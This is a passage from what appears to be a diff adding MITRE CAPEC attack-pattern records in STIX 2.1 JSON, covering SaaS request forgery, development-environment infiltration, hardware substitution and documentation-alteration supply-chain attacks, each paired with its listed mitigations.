based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.", + "external_references": [ + { + "external_id": "CAPEC-510", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/510.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com – Research and Analysis, Adallom, Inc.", + "external_id": "REF-438", + "source_name": "reference_from_CAPEC", + "url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/" + } + ], + "id": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "modified": "2014-06-23T00:00:00.000Z", + "name": "SaaS User Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application." + ], + "x_capec_skills_required": { + "Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. 
Zeus) to spider a targeted site and a way to trick a user into a malicious software download." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.", + "id": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0e244a6-ae66-4ca3-bd73-5e27032bc927", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "spec_version": "2.1", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. 
(e.g., spidering)", + "id": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--217875b4-959c-4ec6-a80c-6f5897b54681", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "spec_version": "2.1", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. 
This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-511", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/511.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Software Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. 
The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.", + "Using rogue versions of Xcode (Apple's app development tool) downloaded from third-party websites, it was possible for the adversary to insert malicious code into legitimate apps during the development process." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid the common delivery mechanisms of adversaries, such as email attachments, which could introduce the malware.", + "id": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-511-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acf31545-11ce-4c74-9740-158a6572cd6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. 
This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-516", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/516.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution During Baselining", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. 
The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate supplier.", + "Medium": "Intelligence data on victim's purchasing habits." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.", + "id": "course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a845e64-34a5-43e1-8fa0-f36bd296a642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--62164250-4c65-4a4d-b6db-0f1e9fd43d4f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. 
This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.", + "external_references": [ + { + "external_id": "CAPEC-517", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/517.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Circumvent Dial-down", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. 
An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of internal software and hardware components within manufacturer's development environment.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Digitize documents and cryptographically sign them to verify authenticity.", + "id": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6cdce0e6-c111-4a35-bd94-2fd9bc65869b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a2f5635-3164-4960-8cc1-c813d8955f6c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure deleted files are actually deleted.", + "id": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4cacf14-7742-4ddf-95a4-24294756229f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain backups of the document for recovery and verification.", + "id": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--693e162c-2556-4f8e-8c5f-d33b4a5b2891", + "modified": 
"2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-518", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/518.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Produce Under-performing Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software and hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5bea13-d325-4683-9122-b0c7ccec06d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281d70fc-8c58-4d68-b561-0575eb42bff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9382bcf3-0604-4bb8-9d38-f4c17b9747d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--f11b49e7-b222-4698-9d7e-7b3098fd3c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd6d1e37-7460-48f7-bfff-9cbb383c02d6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6adbdfe4-b1d6-43dd-880d-318b88f93118", + "spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate need-to-know information from system configuration information depending on the user.", + "id": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-518-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d472e01d-f213-4ced-9fb6-4461edf5f092", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-519", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/519.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Cause Errors in System Design", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. 
An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--692efabe-275a-4cc4-bce9-b954a6533546", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 